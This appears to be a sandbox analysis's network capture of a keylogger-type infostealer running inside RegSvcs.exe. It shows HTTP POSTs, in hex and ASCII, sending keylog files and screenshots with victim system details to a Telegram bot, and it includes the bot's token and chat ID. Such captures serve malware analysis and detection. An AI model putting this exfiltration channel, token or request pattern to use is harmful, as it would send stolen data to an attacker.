                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.449817149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:52:28 UTC236OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd20d7ce7df7a9
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 930
                                                                                      Expect: 100-continue
                                                                                      2024-12-06 04:52:28 UTC930OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 37 63 65 37 64 66 37 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 37 63 65 37 64 66 37 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 4b 4c 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 32 30 2f 32 30 32 34 20 30 39 3a 32 32 3a 32 30 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd20d7ce7df7a9Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd20d7ce7df7a9Content-Disposition: form-data; name="caption"New KL Recovered!Time: 12/20/2024 09:22:20User
                                                                                      2024-12-06 04:52:28 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:52:29 UTC1141INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:52:28 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 753
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170393,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460748,"document":{"file_name":"user-610930 2024-12-20 09-22-21.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAECmZlnUoMM3a4w4ERIgZCrO5ZA8ArDPAAC5xQAAjoemVKV-j_3Gnq8jDYE","file_unique_id":"AgAD5xQAAjoemVI","file_size":309},"caption":"New KL Recovered!\n\nTime: 12/20/2024 09:22:20\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.228","caption_entities":[{"offset":178,"length":12,"type":"url"}]}}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.449818149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:52:28 UTC238OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd20dd74936aab
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66950
                                                                                      Expect: 100-continue
                                                                                      2024-12-06 04:52:28 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 64 37 34 39 33 36 61 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 64 37 34 39 33 36 61 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 32 30 2f 32 30 32 34 20 31 30 3a 30 32 3a 34 32 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd20dd74936aabContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd20dd74936aabContent-Disposition: form-data; name="caption"New SC Recovered!Time: 12/20/2024 10:02:42User
                                                                                      2024-12-06 04:52:28 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:52:28 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:52:28 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:52:28 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:52:28 UTC1364OUTData Raw: 60 b8 51 45 14 c0 28 a2 8a 00 d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 51 cb ae 5f 4f 3c 33 dc 49 e7 cd 15 b4 96 de 64 a5 99 99 5c 38 24 92 79 20 48 71 f4 15 99 45 20 b8 51 45 14 00 51 45 14 c0 eb a6 f1 8c 57 31 c4 92 da 3c 7e 5a e0 15 60 d9 fe 58 e9 52 4d e3 68 67 8b ca 6d 34 c4 0f 57 59 03 1f cb 03 f9 d7 1b 45 64 a9 41 28 24 be 1d 56 fd ee 37 26 dc 9f f3 6e 74 5a c7 89 57 51 d2 17 4e 4b 66 55 57 0d e6 33 72 71 9e d8 f7 f5 ae 76 8a 2a a3 15 1b db ab b8 36 dd 93 e8 14 51 45 50 8d ed 2b 56 41 12 c1 3b 6c 65 e1 5b d4 57 5d a6 ea 77 77 0d b5 ef 00 81 06 5e 43 b4 1c 7a 6e eb fa d7 99 d1 5c f5 28 b9 26 a1 2b 5c ce 34 d4 67 cd d3 b1 db f8 ab c4 f0 3d ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 14 61 f0 f0 c3 c3 92 07
                                                                                      Data Ascii: `QE(>qu,y_'8QQ_O<3Id\8$y HqE QEQEW1<~Z`XRMhgm4WYEdA($V7&ntZWQNKfUW3rqv*6QEP+VA;le[W]ww^Czn\(&+\4g=XH$2I"zEa
                                                                                      2024-12-06 04:52:28 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 64 37 34 39 33 36 61 61 62 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd20dd74936aab--
                                                                                      2024-12-06 04:52:28 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:52:29 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:52:29 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170394,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460749,"document":{"file_name":"user-610930 2024-12-20 10-02-47.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZmmdSgw0amSAp_YYSFDA5u6H2kV9KAALoFAACOh6ZUvzQ81Q8-pdHAQAHbQADNgQ","file_unique_id":"AQAD6BQAAjoemVJy","file_size":12291,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZmmdSgw0amSAp_YYSFDA5u6H2kV9KAALoFAACOh6ZUvzQ81Q8-pdHAQAHbQADNgQ","file_unique_id":"AQAD6BQAAjoemVJy","file_size":12291,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmZpnUoMNGpkgKf2GEhQwObuh9pFfSgAC6BQAAjoemVL80PNUPPqXRzYE","file_unique_id":"AgAD6BQAAjoemVI","file_size":66329},"caption":"New SC Recovered!\n\nTime: 12/20/2024 10:02:42\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.449849149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:52:40 UTC238OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd26c0b81f4a09
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66950
                                                                                      Expect: 100-continue
                                                                                      2024-12-06 04:52:40 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 63 30 62 38 31 66 34 61 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 63 30 62 38 31 66 34 61 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 32 37 2f 32 30 32 34 20 32 31 3a 35 32 3a 31 31 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd26c0b81f4a09Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd26c0b81f4a09Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/27/2024 21:52:11User
                                                                                      2024-12-06 04:52:40 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:52:40 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:52:40 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:52:40 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:52:40 UTC1364OUTData Raw: 60 b8 51 45 14 c0 28 a2 8a 00 d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 51 cb ae 5f 4f 3c 33 dc 49 e7 cd 15 b4 96 de 64 a5 99 99 5c 38 24 92 79 20 48 71 f4 15 99 45 20 b8 51 45 14 00 51 45 14 c0 eb a6 f1 8c 57 31 c4 92 da 3c 7e 5a e0 15 60 d9 fe 58 e9 52 4d e3 68 67 8b ca 6d 34 c4 0f 57 59 03 1f cb 03 f9 d7 1b 45 64 a9 41 28 24 be 1d 56 fd ee 37 26 dc 9f f3 6e 74 5a c7 89 57 51 d2 17 4e 4b 66 55 57 0d e6 33 72 71 9e d8 f7 f5 ae 76 8a 2a a3 15 1b db ab b8 36 dd 93 e8 14 51 45 50 8d ed 2b 56 41 12 c1 3b 6c 65 e1 5b d4 57 5d a6 ea 77 77 0d b5 ef 00 81 06 5e 43 b4 1c 7a 6e eb fa d7 99 d1 5c f5 28 b9 26 a1 2b 5c ce 34 d4 67 cd d3 b1 db f8 ab c4 f0 3d ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 14 61 f0 f0 c3 c3 92 07
                                                                                      Data Ascii: `QE(>qu,y_'8QQ_O<3Id\8$y HqE QEQEW1<~Z`XRMhgm4WYEdA($V7&ntZWQNKfUW3rqv*6QEP+VA;le[W]ww^Czn\(&+\4g=XH$2I"zEa
                                                                                      2024-12-06 04:52:40 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 63 30 62 38 31 66 34 61 30 39 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd26c0b81f4a09--
                                                                                      2024-12-06 04:52:41 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:52:41 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:52:41 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170400,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460761,"document":{"file_name":"user-610930 2024-12-27 21-52-12.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZoGdSgxkfgsIXl2IIHGvfgfczcp-jAALuFAACOh6ZUkkeKNUUJNJwAQAHbQADNgQ","file_unique_id":"AQAD7hQAAjoemVJy","file_size":12291,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZoGdSgxkfgsIXl2IIHGvfgfczcp-jAALuFAACOh6ZUkkeKNUUJNJwAQAHbQADNgQ","file_unique_id":"AQAD7hQAAjoemVJy","file_size":12291,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaBnUoMZH4LCF5diCBxr34H3M3KfowAC7hQAAjoemVJJHijVFCTScDYE","file_unique_id":"AgAD7hQAAjoemVI","file_size":66329},"caption":"New SC Recovered!\n\nTime: 12/27/2024 21:52:11\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.449861149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:52:46 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd2db458e448f1
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66950
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:52:46 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 62 34 35 38 65 34 34 38 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 62 34 35 38 65 34 34 38 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 35 2f 32 30 32 35 20 31 38 3a 31 31 3a 31 33 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd2db458e448f1Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd2db458e448f1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/05/2025 18:11:13User
